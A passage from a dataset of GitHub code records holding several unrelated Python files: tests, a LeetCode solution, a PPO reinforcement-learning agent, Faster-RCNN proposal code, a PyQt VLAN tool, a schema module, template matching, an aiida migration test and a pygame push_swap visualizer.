run_invalid_tag_worker\n assert status == 1\n\n\nclass TestParabotPools:\n def test_valid_pool_path_workers(self, run_valid_pool_path_workers):\n status: List[Optional[int]] = run_valid_pool_path_workers\n assert 1 not in status\n\n def test_timeout_pool_path_workers(self, run_timeout_pool_path_workers):\n status: int = run_timeout_pool_path_workers\n assert status == 1\n\n def test_valid_pool_tag_workers(self, run_valid_pool_tag_workers):\n status: List[Optional[int]] = run_valid_pool_tag_workers\n check: List[bool] = []\n\n for stat in status:\n if stat == 0:\n check.append(True)\n else:\n check.append(False)\n\n assert all(check) is True\n\n\nclass TestE2E:\n def test_e2e(self, run_e2e):\n status: Any = run_e2e\n assert status.returncode == 0\n","repo_name":"radekBednarik/parabot","sub_path":"tests/test_parabot.py","file_name":"test_parabot.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"57"} +{"seq_id":"20499864725","text":"\n# runtime: O(n * m)\n# space : O(1)\n\nclass Solution:\n def setZeroes(self, matrix: List[List[int]]) -> None:\n rows, cols, rZero = len(matrix), len(matrix[0]), False\n\n # Denote Row/Col to be 0'd\n for row in range(rows):\n for col in range(cols):\n if matrix[row][col] == 0:\n matrix[0][col] = 0\n if row > 0:\n matrix[row][0] = 0\n else:\n rZero = True\n\n # Every Row/Col aside from 0th\n for row in range(1, rows):\n for col in range(1, cols):\n if matrix[row][0] == 0 or matrix[0][col] == 0:\n matrix[row][col] = 0\n\n # 0th Row Across\n if matrix[0][0] == 0:\n for row in range(rows):\n matrix[row][0] = 0\n\n # 0th Col Down\n if rZero:\n for col in range(cols):\n matrix[0][col] = 0\n","repo_name":"jrdwe/leet","sub_path":"leet_py/SetMatrixZeroes_73.py","file_name":"SetMatrixZeroes_73.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"72884452659","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport tensorflow as tf\nimport numpy as np\n\n\nfrom hobotrl.playback import BatchIterator, MapPlayback, to_columnwise, to_rowwise\nimport hobotrl.network as network\nimport hobotrl.sampling as sampling\nimport hobotrl.target_estimate as target_estimate\nimport hobotrl.tf_dependent.distribution as distribution\nfrom hobotrl.tf_dependent.base import BaseDeepAgent\nfrom value_based import GreedyStateValueFunction\nfrom hobotrl.policy import StochasticPolicy\n\n\nclass PPOUpdater(network.NetworkUpdater):\n def __init__(self, policy_dist, old_dist, v_function, old_v_function, target_estimator,\n entropy=1e-1, clip_epsilon=0.1, value_weight=1.0):\n \"\"\"\n :param policy_dist:\n :type policy_dist: distribution.NNDistribution\n :param old_dist:\n :type old_dist: distribution.NNDistribution\n :param v_function: Function calculating state value\n :type v_function: network.NetworkFunction\n :param old_v_function: Function calculation old state value\n :type old_v_function: network.NetworkFunction\n :param target_estimator:\n :type target_estimator:\n :param entropy: entropy weight, c2 in paper\n :param value_weight: value function loss weight, c1 in paper\n :param clip_epsilon: clipped value of prob ratio\n \"\"\"\n super(PPOUpdater, self).__init__()\n self._policy_dist, self._old_dist = policy_dist, old_dist\n self._v_function, self._old_v_function = v_function, old_v_function\n self._target_estimator = target_estimator\n self._entropy = entropy\n with tf.name_scope(\"PPOUpdater\"):\n with tf.name_scope(\"input\"):\n self._input_target_v = tf.placeholder(dtype=tf.float32, shape=[None], name=\"input_target_v\")\n self._input_action = policy_dist.input_sample()\n self._input_entropy = tf.placeholder(dtype=tf.float32, shape=[], name=\"input_entropy\")\n op_v = v_function.output().op\n old_op_v = tf.stop_gradient(old_v_function.output().op)\n with tf.name_scope(\"value\"):\n td = self._input_target_v - op_v\n org_v_loss = network.Utils.clipped_square(td)\n clipped_v = old_op_v + tf.clip_by_value(op_v - old_op_v, -clip_epsilon, clip_epsilon)\n clip_v_loss = network.Utils.clipped_square(self._input_target_v - clipped_v)\n self._v_loss = tf.reduce_mean(tf.maximum(org_v_loss, clip_v_loss))\n self._org_v_loss, self._clip_v_loss = org_v_loss, clip_v_loss\n with tf.name_scope(\"policy\"):\n advantage = self._input_target_v - op_v\n self._advantage = advantage\n _mean, _var = tf.nn.moments(advantage, axes=[0])\n self._std_advantage = tf.stop_gradient(advantage / (tf.sqrt(_var) + 1.0))\n ratio = tf.exp(policy_dist.log_prob() - tf.stop_gradient(old_dist.log_prob()))\n clipped_ratio = tf.clip_by_value(ratio, 1.0 - clip_epsilon, 1.0 + clip_epsilon)\n pi_loss = tf.reduce_mean(tf.minimum(ratio * self._std_advantage, clipped_ratio * self._std_advantage))\n entropy_loss = tf.reduce_mean(self._policy_dist.entropy())\n self._pi_loss = pi_loss\n self._ratio, self._clipped_ratio = ratio, clipped_ratio\n self._op_loss = value_weight * self._v_loss - (self._pi_loss + self._input_entropy * entropy_loss)\n self._update_operation = network.MinimizeLoss(self._op_loss,\n var_list=self._v_function.variables +\n self._policy_dist._dist_function.variables)\n\n def declare_update(self):\n return self._update_operation\n\n def update(self, sess, batch, *args, **kwargs):\n state, action, reward, next_state, episode_done = batch[\"state\"], \\\n batch[\"action\"], \\\n batch[\"reward\"], \\\n batch[\"next_state\"], \\\n batch[\"episode_done\"]\n target_value = self._target_estimator.estimate(state, action, reward, next_state, episode_done)\n feed_dict = self._v_function.input_dict(state)\n feed_dict.update(self._policy_dist.dist_function().input_dict(state))\n feed_more = {\n self._input_action: action,\n self._input_target_v: target_value,\n self._input_entropy: self._entropy\n }\n feed_dict.update(feed_more)\n fetch_dict = {\n \"advantage\": self._advantage,\n \"target_value\": target_value,\n \"pi_loss\": self._pi_loss,\n \"pi_ratio\": self._ratio,\n \"pi_ratio_clip\": self._clipped_ratio,\n \"v_loss\": self._v_loss,\n \"v_loss_org\": self._org_v_loss,\n \"v_loss_clip\": self._clip_v_loss,\n \"entropy\": self._policy_dist.entropy(),\n \"log_prob\": self._policy_dist.log_prob(),\n \"advantage_std\": self._std_advantage,\n }\n if isinstance(self._policy_dist, distribution.NormalDistribution):\n fetch_dict.update({\n \"stddev\": self._policy_dist.stddev(),\n \"mean\": self._policy_dist.mean()\n })\n else:\n pass\n return network.UpdateRun(feed_dict=feed_dict, fetch_dict=fetch_dict)\n\n\nclass PPO(sampling.TrajectoryBatchUpdate,\n BaseDeepAgent):\n def __init__(self,\n f_create_net, state_shape,\n # PPO arguments\n discount_factor, entropy=1e-3, clip_epsilon=0.2,\n # update arguments\n epoch_per_step=4,\n # target estimate\n target_estimator=None,\n # optimizer arguments\n network_optimizer=None, max_gradient=10.0,\n # sampler arguments\n sampler=None,\n batch_size=32,\n horizon=1024,\n\n *args, **kwargs):\n \"\"\"\n :param f_create_net: function: f_create_net(inputs) => {\"pi\": dist_pi, \"q\": q_values},\n in which {inputs} is [input_state],\n {dist_pi} is probability distribution of policy with shape [None, num_actions],\n {q_values} is Q values with shape [None, num_actions];\n or f_create_net(inputs) => {\"mean\": mean, \"stddev\": stddev, \"v\": v},\n in which {mean} {stddev} is mean and stddev if normal distribution for continuous actions,\n {v} is state value.\n :param state_shape:\n :param discount_factor:\n :param entropy: entropy regulator weight.\n :param target_estimator: optional, default to target_estimate.NStepTD\n :type target_estimator.TargetEstimator\n :param network_optimizer: optional, default to network.LocalNetworkOptimizer\n :type network_optimizer: network.NetworkOptimizer\n :param max_gradient: optional, max_gradient clip value\n :param sampler: optional, default to sampling.TrajectoryOnSampler.\n if None, a TrajectoryOnSampler will be created using batch_size.\n :type sampler: sampling.Sampler\n :param batch_size: optional, batch_size when creating sampler\n :param args:\n :param kwargs:\n \"\"\"\n kwargs.update({\n \"f_create_net\": f_create_net,\n \"state_shape\": state_shape,\n \"discount_factor\": discount_factor,\n \"entropy\": entropy,\n \"target_estimator\": target_estimator,\n \"max_gradient\": max_gradient,\n \"batch_size\": batch_size,\n \"horizon\": horizon,\n \"clip_epsilon\": clip_epsilon,\n \"epoch_per_step\": epoch_per_step,\n })\n if network_optimizer is None:\n network_optimizer = network.LocalOptimizer(grad_clip=max_gradient)\n if sampler is None:\n sampler = sampling.TrajectoryOnSampler(interval=horizon, check_episode_done=False)\n kwargs.update({\"sampler\": sampler})\n\n super(PPO, self).__init__(*args, **kwargs)\n\n self._epoch_py_step = epoch_per_step\n self._batch_size = batch_size\n\n pi = self.network[\"pi\"]\n if pi is not None:\n # discrete action: pi is categorical probability distribution\n self._input_action = tf.placeholder(dtype=tf.uint8, shape=[None], name=\"input_action\")\n self._pi_function = network.NetworkFunction(self.network[\"pi\"])\n self._pi_distribution = distribution.DiscreteDistribution(self._pi_function, self._input_action)\n self._old_pi_function = network.NetworkFunction(self._old_network[\"pi\"])\n self._old_pi_distribution = distribution.DiscreteDistribution(self._old_pi_function, self._input_action)\n q = self.network[\"q\"]\n if q is not None:\n # network outputs q\n self._q_function = network.NetworkFunction(q)\n self._v_function = GreedyStateValueFunction(self._q_function)\n self._old_q_function = network.NetworkFunction(self._old_network[\"q\"])\n self._old_v_function = GreedyStateValueFunction(self._old_q_function)\n else:\n # network output v\n self._v_function = network.NetworkFunction(self.network[\"v\"])\n self._old_v_function = network.NetworkFunction(self._old_network[\"v\"])\n else:\n # continuous action: mean / stddev represents normal distribution\n dim_action = self.network[\"mean\"].op.shape.as_list()[-1]\n self._input_action = tf.placeholder(dtype=tf.float32, shape=[None, dim_action], name=\"input_action\")\n self._pi_function = network.NetworkFunction(\n outputs={\"mean\": self.network[\"mean\"], \"stddev\": self.network[\"stddev\"]},\n inputs=self.network.inputs\n )\n self._pi_distribution = distribution.NormalDistribution(self._pi_function, self._input_action)\n self._v_function = network.NetworkFunction(self.network[\"v\"])\n self._old_pi_function = network.NetworkFunction(\n outputs={\"mean\": self._old_network[\"mean\"], \"stddev\": self._old_network[\"stddev\"]},\n inputs=self._old_network.inputs\n )\n self._old_pi_distribution = distribution.NormalDistribution(self._old_pi_function, self._input_action)\n self._old_v_function = network.NetworkFunction(self._old_network[\"v\"])\n if target_estimator is None:\n target_estimator = target_estimate.GAENStep(self._v_function, discount_factor)\n self.network_optimizer = network_optimizer\n network_optimizer.add_updater(\n PPOUpdater(policy_dist=self._pi_distribution,\n old_dist=self._old_pi_distribution,\n v_function=self._v_function,\n old_v_function=self._old_v_function,\n target_estimator=target_estimator,\n entropy=entropy,\n clip_epsilon=clip_epsilon), name=\"ppo\")\n network_optimizer.add_updater(network.L2(self.network), name=\"l2\")\n network_optimizer.compile()\n\n self._policy = StochasticPolicy(self._pi_distribution)\n\n def init_network(self, f_create_net, state_shape, *args, **kwargs):\n input_state = tf.placeholder(dtype=tf.float32, shape=[None] + list(state_shape), name=\"input_state\")\n net = network.Network([input_state], f_create_net, var_scope=\"learn\")\n self._old_network = network.Network([input_state], f_create_net, var_scope=\"old\")\n self._old_network_syncer = network.NetworkSyncer(net, self._old_network)\n return net\n\n def update_on_trajectory(self, batch):\n # here we receive batch of size horizon.\n infos = []\n info = {}\n for i in range(self._epoch_py_step):\n for mini_batch in BatchIterator(batch, self._batch_size, check_episode_done=True):\n self.network_optimizer.update(\"ppo\", self.sess, mini_batch)\n self.network_optimizer.update(\"l2\", self.sess)\n info = self.network_optimizer.optimize_step(self.sess)\n info = dict([(k, np.mean(info[k])) for k in info])\n infos.append(info)\n self._old_network_syncer.sync(self.sess, 1.0)\n\n return to_columnwise(infos), {}\n\n def set_session(self, sess):\n super(PPO, self).set_session(sess)\n self.network.set_session(sess)\n self._old_network.set_session(sess)\n self._pi_distribution.set_session(sess)\n self._old_pi_distribution.set_session(sess)\n\n def act(self, state, **kwargs):\n return self._policy.act(state, **kwargs)\n\n","repo_name":"hobotrl/hobotrl","sub_path":"hobotrl/algorithms/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":13004,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"57"} +{"seq_id":"16053921361","text":"# encoding: utf-8\r\n\"\"\"\r\n@author: zeming li\r\n@contact: zengarden2009@gmail.com\r\n\"\"\"\r\n\r\nfrom libs.configs import cfgs\r\nfrom libs.box_utils import encode_and_decode\r\nfrom libs.box_utils import boxes_utils\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ndef postprocess_rpn_proposals(rpn_bbox_pred, rpn_cls_prob, img_shape, anchors, is_training):\r\n '''\r\n\r\n :param rpn_bbox_pred: [-1, 4]\r\n :param rpn_cls_prob: [-1, 2]\r\n :param img_shape:\r\n :param anchors:[-1, 4]\r\n :param is_training:\r\n :return:\r\n '''\r\n\r\n if is_training:\r\n pre_nms_topN = cfgs.RPN_TOP_K_NMS_TRAIN # 默认12000\r\n post_nms_topN = cfgs.RPN_MAXIMUM_PROPOSAL_TARIN # 默认2000\r\n nms_thresh = cfgs.RPN_NMS_IOU_THRESHOLD # 默认0.7\r\n else:\r\n pre_nms_topN = cfgs.RPN_TOP_K_NMS_TEST # 默认6000\r\n post_nms_topN = cfgs.RPN_MAXIMUM_PROPOSAL_TEST # 默认300\r\n nms_thresh = cfgs.RPN_NMS_IOU_THRESHOLD # 默认0.7\r\n\r\n cls_prob = rpn_cls_prob[:, 1]\r\n\r\n # 1. decode boxes\r\n # clw note:这个函数接受RPN网络的预测框位置,以及预测的类别(两类),图像的尺寸大小,以及生成的锚点作为输入。\r\n # 经过解码后,得到的是真实的预测框的位置,因为有可能预测的框比设定的选取前N个框的个数还小,\r\n # 因此在预测框的数目以及设定的数目之间取最小值,之后再采用 tf.image.non_max_suppression抑制,\r\n # 选取最终的非极大值抑制后的Top K个框,原论文中未采用NMS之前为12000个(就是上面的cfgs.RPN_TOP_K_NMS_TRAIN),\r\n # NMS后为2000个(就是上面的cfgs.RPN_MAXIMUM_PROPOSAL_TARIN)。\r\n # 这里还没有具体的分类那个框是那个目标,只是选出了前K个可能存在目标的框。\r\n decode_boxes = encode_and_decode.decode_boxes(encoded_boxes=rpn_bbox_pred,\r\n reference_boxes=anchors,\r\n scale_factors=cfgs.ANCHOR_SCALE_FACTORS)\r\n\r\n # decode_boxes = encode_and_decode.decode_boxes(boxes=anchors,\r\n # deltas=rpn_bbox_pred,\r\n # scale_factor=None)\r\n\r\n # 2. clip to img boundaries\r\n decode_boxes = boxes_utils.clip_boxes_to_img_boundaries(decode_boxes=decode_boxes,\r\n img_shape=img_shape)\r\n\r\n # 3. get top N to NMS\r\n if pre_nms_topN > 0: # clw note:初步得到一系列框(~60*40*9=20k)之后,如果是训练集,会去掉与边界相交的anchors,因此\r\n # 数量会大大减小,即NMS之前的TopK个框(这里默认值是12k,文中给的6k),之后再进行NMS。\r\n pre_nms_topN = tf.minimum(pre_nms_topN, tf.shape(decode_boxes)[0], name='avoid_unenough_boxes')\r\n cls_prob, top_k_indices = tf.nn.top_k(cls_prob, k=pre_nms_topN)\r\n decode_boxes = tf.gather(decode_boxes, top_k_indices)\r\n\r\n # 4. NMS\r\n keep = tf.image.non_max_suppression(\r\n boxes=decode_boxes,\r\n scores=cls_prob,\r\n max_output_size=post_nms_topN,\r\n iou_threshold=nms_thresh)\r\n\r\n final_boxes = tf.gather(decode_boxes, keep)\r\n final_probs = tf.gather(cls_prob, keep)\r\n\r\n return final_boxes, final_probs\r\n\r\n","repo_name":"clw5180/TensorFlow_Practice","sub_path":"Faster-RCNN_Tensorflow/libs/detection_oprations/proposal_opr.py","file_name":"proposal_opr.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38894781362","text":"from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QStyle, QPushButton\nfrom PyQt5.QtWidgets import QVBoxLayout, QTabWidget, QMessageBox\nimport sys\nfrom aego.pyqt import qt5\nfrom aego.pyqt.text_viewer_dialog import TextViewerDialog\nfrom data.gui_vlans_widgets import FoundVlansWidget, MissedVlansWidget\nfrom data.gui_commands_widgets import TypicalCommandsWidget, NewCommandsWidget, CustomCommandsWidget\n\n\nclass SwVlans(QMainWindow):\n _VERSION = \"2.0\"\n _TITLE = \"SwVlans\"\n\n def __init__(self):\n super(SwVlans, self).__init__()\n self.setWindowTitle(f\"{self._TITLE} {self._VERSION}\")\n self.setWindowIcon(self.style().standardIcon(QStyle.SP_DesktopIcon))\n self.resize(400, 0)\n\n self._init_ui()\n\n def _init_ui(self):\n widgets = {\n FoundVlansWidget(\"Конфиг 1\"),\n FoundVlansWidget(\"Конфиг 2\")\n }\n self._vlan_tab = QTabWidget()\n for widget in widgets:\n self._vlan_tab.addTab(widget, widget.name)\n self._vlan_tab.addTab(MissedVlansWidget(*widgets), \"Недостающие vlan'ы\")\n\n self._command_tab = QTabWidget()\n self._command_tab.addTab(TypicalCommandsWidget(), \"Обычные команды\")\n self._command_tab.addTab(NewCommandsWidget(), \"Новые команды\")\n self._command_tab.addTab(CustomCommandsWidget(), \"Свой вывод\")\n\n self._run_compiling_btn = QPushButton(\"Выполнить\")\n self._run_compiling_btn.clicked.connect(self._run_compiling)\n\n main_layout = QVBoxLayout()\n main_layout.addWidget(self._vlan_tab)\n main_layout.addWidget(self._command_tab)\n main_layout.addWidget(self._run_compiling_btn)\n main_widget = QWidget()\n main_widget.setLayout(main_layout)\n self.setCentralWidget(main_widget)\n\n def _run_compiling(self):\n \"\"\"Запускает компиляцию команд.\"\"\"\n vlans = self._vlan_tab.currentWidget().get()\n compiler, ports = self._command_tab.currentWidget().get()\n text = compiler(vlans, ports)\n TextViewerDialog(text, self._TITLE).exec()\n\n def closeEvent(self, event):\n \"\"\"Event закрытие окна.\"\"\"\n event_ = QMessageBox.question(self, \"Вопрос\", \"Вы уверены, что хотите выйти?\",\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n if event_ == QMessageBox.No:\n event.ignore()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n qt5.set_translator(app) # языковой пакет\n window = SwVlans()\n window.show()\n sys.exit(app.exec())\n","repo_name":"staego/pt_tools","sub_path":"sw_vlans/sw_vlans.pyw","file_name":"sw_vlans.pyw","file_ext":"pyw","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70441642098","text":"#coding: utf-8\nu\"\"\"Caty スキーマモジュール。\nCaty では JSON スキーマを元にした独自のスキーマ言語をアプリケーション全体にわたって利用する。\nこのモジュールではスキーマの構文については特に定義せず、スキーマの動作について定義する。\n\n== 概観\n\nCaty におけるスキーマモジュールの実体は、以下のサブモジュール群によって実装される。\n\n;caty.core.schema.base\n:すべてのスキーマのベースクラス及びユニオン型、タグ付き型、ユーザ定義型などの実装\n;caty.core.schema.number\n:数値(整数)型の実装\n;caty.core.schema.string\n:文字列型の実装\n;caty.core.schema.binary\n:バイナリ型の実装\n;caty.core.schema.bool\n:真偽値型の実装\n;caty.core.schema.object\n:オブジェクト型の実装\n;caty.core.schema.array\n;配列型の実装\n\n以上のモジュール群によって、以下の組み込み型を定義する。\n\n* integer\n* number\n* string\n* binary\n* boolean\n* object\n* array\n* any\n* null\n* void\n* never\n\n以上の型及びそれらの型に対するタグ付けは無条件に利用可能である。\n上記のリストに無い型は全てユーザ定義型である。\nCaty フレームワークの標準ライブラリで定義されている型も同様であり、\n「Caty コアで定義されている型」と言った場合、上記の組み込み型のみを指す。\n\n== スキーマの使われる場面\n\n主にスキーマは以下の場面で利用される。\n\n* Caty スクリプト内部での型検証\n* 外部入力に対する変換処理\n\nCaty スクリプトの詳細は caty.core.script モジュールを参照すること。\nCaty スクリプトは強く型付けされた言語であり、その型システムが Caty スキーマである。\nまたスキーマは検証だけでなく値の変換機能も有する。\nこれは主に Web 入力に対して適用され、フォームから入力されたデータを\nスキーマを通して変換し、 Caty 内部で利用できるオブジェクトにすると同時に異常な入力の排除を行う。\n\n\"\"\"\n\nfrom caty.core.schema.base import *\nfrom caty.core.schema.number import NumberSchema, IntegerSchema\nfrom caty.core.schema.string import StringSchema\nfrom caty.core.schema.binary import BinarySchema\nfrom caty.core.schema.bool import BoolSchema\nfrom caty.core.schema.array import ArraySchema\nfrom caty.core.schema.object import ObjectSchema, PseudoTag\nfrom caty.core.schema.enum import EnumSchema\nfrom caty.core.schema.bag import BagSchema\nfrom caty.core.schema.exponent import ExponentSchema\n__all__ = [\n \"SchemaBase\",\n \"OperatorSchema\",\n \"UnionSchema\",\n \"IntersectionSchema\",\n \"UpdatorSchema\",\n \"TagSchema\",\n \"ScalarSchema\",\n \"AnySchema\",\n \"NullSchema\",\n \"VoidSchema\",\n \"NeverSchema\",\n \"UndefinedSchema\",\n \"TypeVariable\",\n \"OptionalSchema\",\n \"UnivSchema\",\n \"ForeignSchema\",\n \"NamedSchema\",\n \"TypeReference\",\n \"OverlayedDict\",\n \"SchemaAttribute\",\n \"Annotations\",\n \"Annotation\",\n \"NumberSchema\",\n \"IntegerSchema\",\n \"StringSchema\",\n \"BinarySchema\",\n \"BoolSchema\",\n \"ArraySchema\",\n \"ObjectSchema\",\n \"PseudoTag\",\n \"EnumSchema\",\n \"ValueSchema\",\n \"BagSchema\",\n \"UnaryOpSchema\",\n \"ExtractorSchema\",\n \"ExponentSchema\",\n \"EmptySchema\",\n \"IndefSchema\",\n \"types\",\n \"schemata\",\n]\n# 組み込み・デフォルト定義のスキーマ群\ntypes = {\n 'integer': IntegerSchema(),\n 'number': NumberSchema({}),\n 'string': StringSchema({}),\n 'binary': BinarySchema({}),\n 'boolean': BoolSchema({}),\n 'array': ArraySchema([UnivSchema()], options={'repeat': True}),\n 'object': ObjectSchema(schema_obj={}, wildcard=UnivSchema({})),\n 'any': AnySchema({}),\n 'null': NullSchema({}),\n 'void': VoidSchema({}),\n 'never': NeverSchema({}),\n 'bag': BagSchema([]),\n 'undefined': OptionalSchema(UndefinedSchema()),\n 'univ': UnivSchema({}),\n 'indef': IndefSchema({}),\n 'foreign': ForeignSchema({}),\n}\n\nschemata = types # とりあえず互換性維持のために残しておく\n\n","repo_name":"hidaruma/caty","sub_path":"python/caty/core/schema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"39211900155","text":"import cv2 as cv\nfrom matplotlib import pyplot as plt\nimport copy\nimport imutils\n\ndef main():\n print(\"Multiscaling Template Matching\")\n main_img = cv.imread(\"TestData/img1.jpg\")\n resize_image = main_img.copy()\n template = cv.imread(\"TestData/img1t1.jpg\")\n template_w, template_h = template.shape[:-1]\n result_dict = {}\n\n method = 'cv.TM_SQDIFF_NORMED'\n scaling_factor = 1.15 # factor by which the original image will we be scaled\n limiting_factor = 2 # factor indicating max resizing of the original image\n\n while resize_image.shape[0] < main_img.shape[0] * limiting_factor and \\\n resize_image.shape[1] < main_img.shape[1] * limiting_factor:\n result = cv.matchTemplate(resize_image, template, eval(method))\n minVal, maxVal, minLoc, maxLoc = cv.minMaxLoc(result)\n result_dict[resize_image.shape] = [minVal, maxVal, minLoc, maxLoc]\n resize_image = imutils.resize(resize_image, width=int(resize_image.shape[1] * scaling_factor),\n height=resize_image.shape[0],\n inter=cv.INTER_CUBIC)\n\n # debug code\n\n # main_img_copy = main_img.copy() # debug\n #\n # if eval(method) in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\n # top_left = minLoc\n # else:\n # top_left = maxLoc\n #\n # bottom_right = (top_left[0] + template_w, top_left[1] + template_h)\n #\n # cv.rectangle(main_img_copy, top_left, bottom_right, 255, 2)\n #\n # plt.subplot(121), plt.imshow(result, cmap='gray')\n # plt.title('matching result'), plt.xticks([]), plt.yticks([])\n # plt.subplot(122), plt.imshow(main_img_copy, cmap='gray')\n # plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\n # plt.suptitle(\"Name\")\n # plt.show()\n\n for key in result_dict: # debug\n print(key)\n\n if eval(method) in [cv.TM_SQDIFF, cv.TM_SQDIFF_NORMED]:\n key = find_minVal(result_dict)\n top_left = result_dict[key][2]\n else:\n key = find_maxVal(result_dict)\n top_left = result_dict[key][3]\n\n bottom_right = (top_left[0] + template_w, top_left[1] + template_h)\n\n mainImgResize = main_img.copy()\n mainImgResize = imutils.resize(mainImgResize, width=key[1], height=key[0],\n inter=cv.INTER_CUBIC)\n\n cv.rectangle(mainImgResize, top_left, bottom_right, 255, 2)\n\n plt.subplot(121), plt.imshow(main_img, cmap='gray')\n plt.title('matching result'), plt.xticks([]), plt.yticks([])\n plt.subplot(122), plt.imshow(mainImgResize, cmap='gray')\n plt.title('Detected Point'), plt.xticks([]), plt.yticks([])\n plt.suptitle(\"Name\")\n plt.show()\n\n\ndef find_minVal(dict):\n minKey = list(dict.keys())[0]\n for key in dict:\n if dict[key][0] < dict[minKey][0]:\n minKey = key\n\n return minKey\n\ndef find_maxVal(dict):\n maxKey = list(dict.keys())[0]\n for key in dict:\n if dict[key][1] > dict[maxKey][1]:\n maxKey = key\n\n return maxKey\n\nif __name__==\"__main__\":\n main()\n # resize_Image()","repo_name":"Brij98/Jigsaw_Puzzle_Solver","sub_path":"multiscaling_template_matching.py","file_name":"multiscaling_template_matching.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28224753795","text":"from aiida.tools.importexport.migration.v04_to_v05 import migrate_v4_to_v5\n\nfrom . import ArchiveMigrationTest\n\n\nclass TestMigrate(ArchiveMigrationTest):\n \"\"\"Tests specific for this archive migration.\"\"\"\n\n def test_migrate_external(self):\n \"\"\"Test the migration on the test archive provided by the external test package.\"\"\"\n metadata, data = self.migrate('export_v0.4.aiida', '0.4', '0.5', migrate_v4_to_v5)\n\n # Check schema-changes\n removed_computer_attrs = {'transport_params'}\n removed_node_attrs = {'nodeversion', 'public'}\n for change in removed_computer_attrs:\n # data.json\n for computer in data['export_data']['Computer'].values():\n self.assertNotIn(change, computer, msg=\"'{}' unexpectedly found for {}\".format(change, computer))\n # metadata.json\n self.assertNotIn(\n change,\n metadata['all_fields_info']['Computer'],\n msg=\"'{}' unexpectedly found in metadata.json for Computer\".format(change)\n )\n for change in removed_node_attrs:\n # data.json\n for node in data['export_data']['Node'].values():\n self.assertNotIn(change, node, msg=\"'{}' unexpectedly found for {}\".format(change, node))\n # metadata.json\n self.assertNotIn(\n change,\n metadata['all_fields_info']['Node'],\n msg=\"'{}' unexpectedly found in metadata.json for Node\".format(change)\n )\n","repo_name":"Echoesver/aiida-core","sub_path":"tests/tools/importexport/migration/test_v04_to_v05.py","file_name":"test_v04_to_v05.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"8097396322","text":"import pygame as pg\nfrom term_printer import ColorRGB, cprint\nimport random\nimport subprocess\nimport sys\nfrom config import PUSH_SWAP, CHECKER, MIN, MAX, NB_SIZE, DELAY_TIME\nfrom operations import *\n\n#initial position\nx = 40\ny = 40\nSCREEN_WIDTH = 950\nSCREEN_HEIGHT = 680\n\n#30 + 365 + 30 + 365 + 30 + 100 + 30\nGRAPH_WIDTH = 365\nMARGIN = 30\n\n#SCREEN setting ((width, height)) & caption\nSCREEN= pg.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npg.display.set_caption(\"itkimura push_swap visualizer\")\n\n#random number\ndef random_ints_nodup(MIN, MAX, NB_SIZE):\n NB = []\n while len(NB) < NB_SIZE:\n N = random.randint(MIN, MAX)\n if not N in NB:\n NB.append(N)\n return NB\n\nrandom = random_ints_nodup(MIN, MAX, NB_SIZE)\n\n#width and height of each GRAPH\n\n#color\nr = 248;\nb = 7;\n\ndef init_width(NB):\n newlist = sorted(NB)\n for i in range(len(NB)):\n for j in range(len(newlist)):\n if NB[i] == newlist[j]:\n NB[i] = j + 1\n return (NB)\n\ndef print_stack(stack_a, stack_b, ops, ops_nb):\n g = 248;\n height = (SCREEN_HEIGHT - 150) / NB_SIZE;\n width = GRAPH_WIDTH / NB_SIZE;\n limit = len(stack_a)\n if (limit > 500):\n height = 1\n limit = 500\n for i in range(limit):\n #draw a rectangle, (surface, color, position & dimention, x, y, width, height\n g = 248 - (8 * (stack_a[i] / (NB_SIZE / 31)))\n pg.draw.rect(SCREEN, (r, g, b), (30, 120 + (int(height) * i), width * stack_a[i], height));\n limit = len(stack_b)\n if (limit > 500):\n height = 1\n limit = 500\n for i in range(limit):\n #draw a rectangle, (surface, color, position & dimention, x, y, width, height\n g = 248 - (8 * (stack_b[i] / (NB_SIZE / 31)))\n pg.draw.rect(SCREEN, (r, g, b), (60 + GRAPH_WIDTH, 120 + (int(height) * i), width * stack_b[i], height));\n args_len = len(ops)\n if args_len > 50:\n args_len = 50;\n for i in range(args_len):\n font = pg.font.SysFont('Futura', 10);\n ops_nb += 1\n ops_str = ' [ ' + str(ops_nb) + ' ]'\n text = font.render(ops_str, True, (255,255,255));\n text_rect = text.get_rect(center=(MARGIN * 3 + GRAPH_WIDTH * 2, (120 + (10 * i))))\n SCREEN.blit(text, text_rect)\n text = font.render(str(ops[i]), True, (255,255,255));\n text_rect = text.get_rect(center=(MARGIN * 3 + GRAPH_WIDTH * 2 + 30, (120 + (10 * i))))\n SCREEN.blit(text, text_rect)\n\ndef text():\n #title\n font = pg.font.SysFont('Futura', 20);\n text = font.render(\"[Press Sapce to start] itkimura push_swap visualizer\", True, (255,255,255));\n text_rect = text.get_rect(center=(SCREEN_WIDTH/2, 30))\n SCREEN.blit(text, text_rect)\n\n #stack_a\n font = pg.font.SysFont('Futura', 20);\n a_text = font.render(\"stack_a\", True, (255,255,255));\n SCREEN.blit(a_text, [MARGIN, 60])\n\n #stack_b\n b_text = font.render(\"stack_b\", True, (255,255,255));\n SCREEN.blit(b_text, 